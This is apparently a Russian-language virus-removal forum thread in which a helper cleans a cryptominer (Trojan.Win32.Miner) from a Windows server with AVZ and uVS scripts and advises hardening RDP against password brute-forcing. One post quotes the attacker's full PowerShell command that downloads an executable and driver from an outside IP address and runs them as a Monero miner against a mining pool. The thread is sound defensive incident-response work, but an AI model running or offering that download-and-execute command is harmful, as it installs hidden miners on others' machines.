Торможение системы [VHO:Trojan.Win32.Miner.gen]

Printable View

28.02.2021, 22:19
W1nd

Вложений: 1

Торможение системы [VHO:Trojan.Win32.Miner.gen]

Здравствуйте. Очень плохо работает система. Почти каждая программа работает с торможением.
В диспетчере задач процесс COM Surrogate грузит процессор на 95%.
28.02.2021, 22:21
Info_bot

Уважаемый(ая) [B]W1nd[/B], спасибо за обращение на наш форум!

Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
01.03.2021, 07:44
Vvvyg

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe[/url]:[code]begin
TerminateProcessByName('c:\windows\temp\log.txt.exe');
QuarantineFile('C:\Windows\system32\network.exe', '');
QuarantineFile('c:\windows\temp\log.txt.exe', '');
DeleteFile('c:\windows\temp\log.txt.exe', '');
DeleteFile('c:\windows\temp\log.txt.exe', '64');
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 2, true);
end.[/code][color=#FF0000]Пожалуйста, перезагрузите сервер вручную.[/color]

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке [COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR] над над первым сообщением в теме.

Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810]сделайте полный образ автозапуска uVS[/url].
01.03.2021, 13:33
W1nd

Вложений: 1

Здравствуйте, карантин выслал, лог прикрепляю.
01.03.2021, 19:13
Vvvyg

Майнер работает, но в автозагрузке его нет, запускается, похоже, вручную:[CODE]cmd.exe /C powershell.exe -C (New-Object System.Net.WebClient).DownloadFile('http://125.212.214.148:666/wao.exe','C:\windows\teMp\System.exe');(New-Object Net.WebClient).DownloadFile('http://125.212.214.148:666/WinRing0x64.sys', 'C:\Windows\temp\WinRing0x64.sys') && C:\Windows\temp\System.exe --donate-level 1 -o europe.randomx-hub.miningpoolhub.com:20580 -u hiddensec070.ww -a rx/0 --coin monero -B -l C:\ProgramData\log.txt && del C:\Windows\temp\System.exe[/CODE]Запускается от системы, удалять его можно, но проблему это не решит.

Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):[code];uVS v4.11.3 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
; C:\WINDOWS\TEMP\SYSTEM.EXE
rbl 569FCF95F3889CEFD87C1B425FA37B03
dirzooex %SystemRoot%\TEMP
zoo %SystemRoot%\TEMP\SYSTEM.EXE
addsgn A1BA20CF1DE779676D3051F9E97612258E75B47B0E62AC13853CF57B50E658BD23479466E5645401A84D7B77161649FA7C049C70A6193B3265F44AD3D6DDA865 8 Tool.BtcMine.2492 [DrWeb] 7

chklst
delvir

deltmp
czoo[/code]
Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.

В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

Скорее всего, взломали по RDP.

Смените всем пользователям, у кого есть права входа по RDP, пароли, установите сложные.
Уберитеправа администратора у всех пользователей, кому они действительно не необходимы, при грамотной настройке прав всем они не нужны.
Учёткам Администратор/Administrator/Admin запретить удалённый доступ, для администрирования через терминал пользуйтесь другими, с
нетипичным, лучше не словарным (типа rdp1) именем и сложными паролями.
Включить защиту от буртфорса (подбора) паролей. Простейший вариант - через политики, блокировать учётку на N минут после 3-4 неудачных попыток входа. Есть более продвинутые варианты с использованием стороннего софта, например: [URL="https://neoserver.ru/help/kak-zashchitit-rdp-podklyuchenie-na-windows-server"]Инструкция по защите RDP подключения[/URL], или возможностей маршрутизатора, для Mikrotik, в частности, есть множество изощрённых рецептов.

И зачем открыты множество портов наружу, включая 53-й, у вас сервер DNS на весь интернет раздаёт? ЗаDDOSят.

Эти так вообще только для хитрого взлома пригодятся:[QUOTE]88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-01 11:30:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC[/QUOTE]
03.03.2021, 17:59
W1nd

Вложений: 1

Добрый день. Карантин выслал, лог прикрепляю.
Данную проблему решит только переустановка системы?
03.03.2021, 20:45
Vvvyg

Вы меня либо не поняли, либо не читали рекомендации вообще. Переустановите систему, не не приняв мер против взлома - получите майнер снова через какое-то время.

Выполните скрипт в UVS:[CODE];uVS v4.11.4 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
dirzooex %SystemRoot%\TEMP
adddir zoo %SystemRoot%\TEMP
zoo %SystemRoot%\TEMP\SYSTEM.EXE
addsgn A1BA20CF1DE779676D3051F9E97612258E75B47B0E62AC13853CF57B50E658BD23479466E5645401A84D7B77161649FA7C049C70A6193B3265F44AD3D6DDA865 8 Tool.BtcMine.2492 [DrWeb] 7

chklst
delvir

regt 27
czoo

cexec wevtutil.exe epl System system.evtx
cexec wevtutil.exe epl Application Application.evtx
cexec wevtutil.exe epl Security Security.evtx
cexec pack\7za.exe a -t7z -sdel -mx9 -m0=lzma:lp=1:lc=0:d=64m Events.7z *.evtx
apply[/CODE]В папке с uVS появится новый архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

В папке с UVS появится архив [B]Events.7z[/B], загрузите его в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку в теме.
06.03.2021, 13:37
W1nd

Вложений: 1

Добрый день.
Ссылка на файл [url]https://my-files.su/ib64on[/url]
Карантин выслал и лог прикрепляю
08.03.2021, 21:42
Vvvyg

Пока всё по-прежнему, брутфориить по RDP можно до посинения. Смена порта ничего не даёт.
Настройте блокировку через болитики, или [URL="https://neoserver.ru/help/kak-zashchitit-rdp-podklyuchenie-na-windows-server"]IPBan[/URL].

Скачайте по той же ссылке обновлённую версию UVS и сделайте новый полный образ автозапуска.
15.03.2021, 21:03
W1nd

Здравствуйте, ссылка на лог [url]https://my-files.su/dn5cim[/url]
15.03.2021, 21:52
Vvvyg

Майнера нет.

Но RDP всё так же подвержен брутфорсу. IPBan отсутствует, насколько вижу.
Кстати в той инструкции ссылка на устаревшую версию и x86. Ставьте [URL="https://github.com/DigitalRuby/IPBan/releases/"]свежую x64[/URL] версию.
15.03.2021, 23:26
W1nd

Свежую версию ipban поставил, все сделал согласно инструкции.
16.03.2021, 20:28
Vvvyg

Теперь банит.

Только один вопрос остался: зачем всё это торчит наружу?[QUOTE]53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-16 17:15:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49910/tcp open msrpc Microsoft Windows RPC[/QUOTE]
16.03.2021, 20:38
CyberHelper

=C8=F2=EE=E3 =EB=E5=F7=E5=ED=E8=FF

=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
[LIST][*]=CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: [B]3[/B][*]=CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: [B]8[/B][*]=C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
=E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
[LIST=3D1][*] c:\windows\system32\network.exe - [B]VHO:Trojan.Win32.Miner.gen=
[/B][*] c:\windows\temp\log.txt.exe - [B]VHO:Trojan.Win32.Miner.gen[/B]=
[*] \system.exe._74948333fd5cced7e04dc67e68096b64371602a9 - [B]VHO:Tr=
ojan.Win32.Miner.gen[/B][/LIST][/LIST]